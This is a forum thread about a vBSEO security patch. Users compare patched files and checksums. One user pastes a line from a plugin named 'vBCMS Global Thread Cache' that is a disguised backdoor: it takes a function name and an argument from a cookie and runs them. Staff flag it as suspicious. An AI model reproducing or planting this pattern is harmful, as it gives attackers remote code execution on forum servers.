This is a discussion on *vBSEO Security Bulletin* All Supported Versions: Patch Release within the vBSEO Announcements forums, part of the Announcements & Pre-Sales category; Originally Posted by faquick I assume I could just download the updated package and replace the ' functions_vbseocp_abstract.php' file, instead ...
Brian Cummiskey / Crawlability Inc.
Security bulletin - Patch Level for all supported versions released
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
Done!
Forumdevi.com Forum Devi - Eğlencenin Devi
And yes, it already has the double quotes changed into single quotes.
@faquick, I did the same. But I verified with the code given able also, and it matches to the T. So I guess replacing the file will work!
Thanks for the heads up but... do you have any idea why that function ws already changed in my 'functions_vbseocp_abstract.php' file? It already had the backslashes in it and all. Weird.
Cesar Aracena
Brian Cummiskey / Crawlability Inc.
Security bulletin - Patch Level for all supported versions released
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
I couldn't find any changes there. The only changes I've found were in vbseo/resources/scripts/vbseo_ajax.js and includes/md5_sums_crawlability_vbseo.php. I also found a bug in includes/md5_sums_crawlability_vbseo.php while checking it.
'/vbseo/resources/js' should be '/vbseo/resources/scripts', not really serious though but if you don't change it you won't know if your vBSEO js contains expected content.
I have downloaded now the actual pack for 3.5.2 on the website and have replaced the 'functions_vbseocp_abstract.php' file - how can I check if I have successfully fixed the bug?
Last edited by Frankcom; 01-23-2012 at 02:38 PM. Reason: wrong
Done thank u
There I have this plugin: vBCMS Global Thread Cache
Code in it is this:
I assume this is ok?PHP Code:/* vBCMS Global Thread Cache */
(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
I have lots of mods and I can't be sure in some plugins what they really do, but assume they are safe. Is this safe plugin?
I have version 3.6 and that line was already the same as the new line you provided, so I didnt need to replace it.
Is this fix associated with the link back exploit?
The code looks suspicious and I would remove this if you did not specifically install something like this.There I have this plugin: vBCMS Global Thread Cache
Oleg Ignatiuk / Crawlability Inc.
Security bulletin - Patch Level for all supported versions released
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!